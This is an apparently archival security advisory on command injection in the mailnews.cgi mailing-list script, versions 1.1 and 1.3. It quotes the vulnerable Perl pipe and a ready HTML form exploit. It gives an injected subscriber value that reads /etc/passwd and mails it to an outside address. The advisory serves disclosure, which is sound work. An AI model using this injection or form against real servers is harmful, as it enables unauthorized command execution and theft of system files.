COMMAND

    mailnews.cgi

SYSTEMS AFFECTED

    mailnews.cgi 1.1, 1.3

PROBLEM

    Kanedaaa  Bohater  found  following.    Author  dont  parse   some
    characters and he use very  stupid "password protection".  We  can
    add or delete  users from maillist  without known admin  password.
    But this is small problem.  Lets see what we can do more.

        open (MAIL, "|$mailprog $member") || die "Can't open $mailprog!\n";

    where $mailprog [default]  is sendmail and  $member is users  from
    usersfile.  Now we  can do something like  this.  Add user  "; cat
    /etc/passwd | mail adam@malysz.pl'  and use subroutine to  execute
    this code.

    Simple exploit in html:

    <HTML>
    <BODY>
    <FORM
    ACTION="http://www.adamalysz.com/cgi-bin/mailnews.cgi" METHOD=POST>
    <INPUT type=hidden NAME="action" value="subscribe">
    <BR>
    User to add with ;  [ex:" ; cat /etc/passwd |mail adam@malysz.pl"
    without qoutas ofcoz ]<INPUT NAME="address" TYPE="TEXT">
    <INPUT  TYPE="SUBMIT" VALUE="Submit">
    </FORM>
    <BR>
    <A HREF="http://www.adamalysz.com./cgi-bin/mailnews.cgi?news">
    Execute command :] </A>
    <CENTER> Peace... </CENTER>
    </BODY>
    </HTML>

SOLUTION

    Nothing yet.